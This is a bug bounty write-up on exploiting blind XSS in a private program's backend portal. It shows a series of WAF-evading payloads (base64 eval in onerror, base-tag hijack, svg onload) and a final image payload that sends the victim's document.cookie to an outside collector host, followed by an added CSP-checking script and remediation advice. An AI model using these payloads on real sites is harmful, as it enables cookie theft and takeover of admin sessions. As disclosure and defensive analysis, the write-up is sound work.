Blind Xss (A mind game to win the battle)

Dirtycoder
Dec 11, 2019 · 2 min read

In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.

I will not take much time and keep the write-up simple and point to point.

It was a private program so we will call it https://redacted.com.

I used https://blindf.com in order to exploit it. It's a platform/tool/framework to find blind XSS.

Attack Starts:

  1. Found a form on https://redacted.com
  2. I put a BHTML payload + BXSS payload in the text field

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>

Result: WAF stopped me from submitting the form.

3. I removed the BXSS payload. Now the payload was

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>

Result: WAF did not stop me and I successfully submitted the form. The next day Blindf confirmed the BHTML payload execution in the backend. Now it's time to submit the BXSS payload, because I knew that the backend portal is vulnerable and I just have to submit the BXSS payload.

4. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>

Result: WAF did not stop me and I successfully submitted the payload. But again only the BHTML payload worked and BXSS did not. Now again, it's time to modify the payload.

5. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">   sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>

Result: WAF stopped me and I could not submit the form. Frustration was at its peak. Again it's time to change the payload.

6. Next payload used: BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Result: Bypassed the WAF, but again only BHTML worked and BXSS failed. Now it was not the time for payload modification but for thinking about the situation.

Situation step by step:

  • I used BHTML + BXSS payloads.
  • Some BXSS payloads bypassed the WAF but did not execute in the backend portal, whereas the BHTML payloads were going well and I was receiving responses back from my BHTML payloads.
  • Maybe something was stopping my remote JS file from executing. [CORS or Same-origin policy]
  • So I have to execute BXSS without including a remote JS file.
  • But how can I confirm the payload execution in the backend if I just show an alert popup to them?
  • The “<img” tag was working but I could not include a remote JS file.
  • I have to make a payload that can respond back and confirm JS code execution.

7. Now it’s time to modify the payload and attack again.

Payload used:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">  <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>

Result: WAF bypassed. BHTML payload executed. BXSS payload executed and I got the cookie value.
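The "Situation step by step" reasoning above and the final result are really a story about which browser-side restriction was in play: a policy that blocks a remote script include (steps 4 to 6) is not the same as one that blocks an inline event handler or an image request carrying data to another host (step 7). The following checker is an added example written for this page, not code from the author or from Blindf. It parses a Content-Security-Policy header and reports, for the three tactics in the write-up, whether that policy would allow them. The page origin is the post's own placeholder https://redacted.com, the callback host is https://blindf.com as used in the post, and the sample policies are constructed for illustration, not the program's real headers.

```python
"""
Added example (not from the original write-up): which CSP directives govern the
three tactics seen in the post. Sample policies below are constructed.
"""
from urllib.parse import urlsplit

# Assumptions: the backend portal origin is the write-up's placeholder, and the
# callback host is the one the post used. Neither is a real target.
PAGE_ORIGIN = "https://redacted.com"
CALLBACK_HOST = "https://blindf.com"


def parse_csp(header):
    """Turn "dir a b; dir2 c" into {"dir": ["a", "b"], "dir2": ["c"]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _directive(policy, name):
    """Fetch a fetch-directive, falling back to default-src as browsers do.
    None means the policy does not restrict this resource type at all."""
    if name in policy:
        return policy[name]
    return policy.get("default-src")


def _host_allowed(sources, url):
    """Does any host or scheme source expression in `sources` match `url`?"""
    u = urlsplit(url)
    for src in sources:
        s = src.lower()
        if s == "*":
            return True
        if s == "'self'":
            if f"{u.scheme}://{u.netloc}" == PAGE_ORIGIN:
                return True
            continue
        if s.startswith("'"):
            continue  # 'none', 'unsafe-inline', nonces, hashes: not host based
        if s.endswith(":"):  # scheme source such as https:
            if u.scheme == s[:-1]:
                return True
            continue
        h = urlsplit(s if "://" in s else f"{u.scheme}://{s}")
        same_host = h.netloc == u.netloc
        wildcard = h.netloc.startswith("*.") and u.netloc.endswith(h.netloc[1:])
        if h.scheme == u.scheme and (same_host or wildcard):
            return True
    return False


def allows_remote_script(policy, url):
    """Steps 4 to 6: <script src=...> pointing at another host."""
    sources = _directive(policy, "script-src")
    return sources is None or _host_allowed(sources, url)


def allows_inline_handler(policy):
    """Steps 4, 6 and 7: JS inside an onload/onerror attribute. This needs
    'unsafe-inline', and browsers ignore 'unsafe-inline' as soon as a nonce or
    hash source is listed ('unsafe-hashes' is deliberately not modelled here)."""
    sources = _directive(policy, "script-src")
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
        for s in lowered
    )
    return "'unsafe-inline'" in lowered and not nonce_or_hash


def allows_image_beacon(policy, url):
    """Steps 2 and 7: an <img> whose src sends a request to a remote host."""
    sources = _directive(policy, "img-src")
    return sources is None or _host_allowed(sources, url)


def assess(header):
    """Summarise what a policy permits for the three tactics in the post."""
    policy = parse_csp(header)
    return {
        "remote_script": allows_remote_script(policy, CALLBACK_HOST + "/bx.php"),
        "inline_handler": allows_inline_handler(policy),
        "image_beacon": allows_image_beacon(policy, CALLBACK_HOST + "/a.jpg"),
    }


SAMPLE_POLICIES = {  # constructed samples, not the program's real headers
    "script restricted, images unrestricted": "script-src 'self' 'unsafe-inline'",
    "strict default-src": "default-src 'self'; script-src 'self'",
    "nonce with open img-src": "script-src 'self' 'nonce-abc123' 'unsafe-inline'; img-src *",
}

if __name__ == "__main__":
    for name, header in SAMPLE_POLICIES.items():
        print(f"{name}: {assess(header)}")
```

The first sample policy is the shape that matches the story: remote scripts from the callback host are refused, yet an inline event handler and an image request to any host are both still allowed, so the step 7 payload works while steps 4 to 6 fail. Restricting img-src (and connect-src) to known hosts, and marking the session cookie HttpOnly so document.cookie cannot read it, are the controls that address the final payload; the root cause remains the backend portal rendering untrusted form input as HTML without output encoding.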

Severity: Critical (9 ~ 10)

Bounty: $1000
